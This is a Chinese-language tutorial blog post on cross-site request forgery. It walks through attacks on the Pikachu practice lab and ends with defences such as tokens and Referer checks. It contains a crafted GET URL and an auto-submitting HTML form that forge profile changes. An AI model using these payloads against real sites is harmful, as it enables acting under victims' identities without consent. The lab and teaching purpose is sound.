CSRF“苏醒的巨人”

1、小场面

  1. 场景一:我点击了一个好友转发的qq空间消息,怎么莫名其妙自己也转发了???
  2. 场景二:我点击了一个不可描述的网页,然后自己的账号做了一些不可描述的操作???

2、CSRF简介

上面两个场面其实就是利用了 CSRF(Cross Site Request Forgery),即跨站请求伪造。攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。可以这么理解:攻击者盗用了你的身份,以你的名义进行某些不可描述的操作。

想象一下,它可以以你的名义发邮件、发消息、转账、修改密码、删除文章/留言/评论…属实可恶!

CSRF 与 XSS 相比,虽然 CSRF 攻击不太流行,但却更加难以防范,所以被认为 CSRF 比 XSS 更具危险性,CSRF 在业内具有“苏醒的巨人”的称号。

3、CSRF原理

一般来说,用户完成以下两个操作,就有可能遭受CSRF攻击。

  1. 登录信任网站A,并在本地生成Cookie。
  2. 在不登出A的情况下,访问危险网站B。

4、CSRF测试

pikachu漏洞练习平台之CSRF

4.1、GET方式

​ ① 用户甲登录信任网站,查看个人信息。

image-20210323205127914

​ ② 攻击者构造恶意的链接,并将其发送给用户甲。

通过抓包可见,修改个人信息后提交的请求方法是GET。

image-20210323211923048

URL里面的四个参数都可以被修改,直接构造URL为:

http://192.168.101.66/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=x&phonenum=000000&add=Mars&email=123@123.com&submit=submit

​ ③ 攻击者通过社工等手段引诱用户甲点击这个链接。如果用户甲此时登录状态或cookie/session没有过期,则他的信息就被修改了。

image-20210323212754122

可以看到,个人信息内容按照恶意链接的设置被修改了,而用户甲仅点击了那个不明链接。

4.2、POST方式

​ ① 同样,用户乙登录了他信任的网站,一切正常。

image-20210323213429091

​ ② 攻击者构造恶意的链接,并将其发送给用户乙。

抓包可见这次的请求方式是POST,URL不再显示修改参数,所以无法再使用上述办法(即通过URL来伪造请求)进行修改。

image-20210323213939444

但可以自行创建一个恶意表单,让用户点击这个表单的URL,通过此表单向存在CSRF漏洞的页面去提交POST请求。

<!DOCTYPE html>
<html>
<head lang="en">
	<title>csrf_post</title>
	<script>
    window.onload = function() {
    document.getElementById("postsubmit").click();
  }
    </script>
</head>
<body>
       <form action="http://localhost/pikachu/vul/csrf/csrfpost/csrf_post_edit.php"  method="POST">
       	 <input type="text" name="sex" value="1"><br>
       	 <input type="hidden" name="phonenum" value="hacker"><br>
       	 <input type="hidden" name="add" value="china"><br>
       	 <input type="hidden" name="email" value="hacker"><br>
       	 <input id="postsubmit" type="submit" name="submit" value="submit" />
       </form>
</body>
</html>

​ ③ 用户乙点击了这个恶意表单的链接后,其个人信息被修改。

image-20210323215151210

5、CSRF防御

​ ① 尽量使用POST

GET接口太容易被拿来做CSRF攻击,接口最好限制为POST使用,降低攻击风险。

当然POST并不是万无一失,攻击者只要构造一个form就可以,但需要在第三方页面做,这样就增加暴露的可能性。

​ ② 二次验证

在通常情况下,验证码能很好遏制CSRF攻击。当用户收到验证码提示后,可能会心存怀疑,就不会乖乖中招。但是出于用户体验考虑,网站不能给所有的操作都加上验证码。

​ ③ Referer Check

Referer Check在Web最常见的应用就是“防止图片盗链”。同理,Referer Check也可以被用于检查请求是否来自合法的“源”(Referer值是否是指定页面,或者网站的域),如果都不是,那么就极可能是CSRF攻击。

但是因为服务器并不是什么时候都能取到Referer,所以也无法作为CSRF防御的主要手段。

​ ④ Token认证

Token 即标志,记号的意思,也叫作令牌。

例子:

  1. 用户访问某个表单页面。
  2. 服务端生成一个Token,放在用户的Session中,或者浏览器的Cookie中。
  3. 在页面表单附带上Token参数。
  4. 用户提交请求后, 服务端验证表单中的Token是否与用户Session(或Cookies)中的Token一致,一致为合法请求,不是则非法请求。

这个Token的值必须是随机的,不可预测的。由于Token的存在,攻击者无法再构造一个带有合法Token的请求实施CSRF攻击。另外使用Token时应注意Token的保密性,尽量把敏感操作由GET改为POST,以form或AJAX形式提交,避免Token泄露。

CSRF的Token仅仅适用于对抗CSRF攻击。当网站同时存在XSS漏洞时候,那这个方案也是空谈。因为攻击者可以通过js获取Token值。

6、参考资料

[1] Pikachu之CSRF

[2] Web安全之CSRF攻击

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值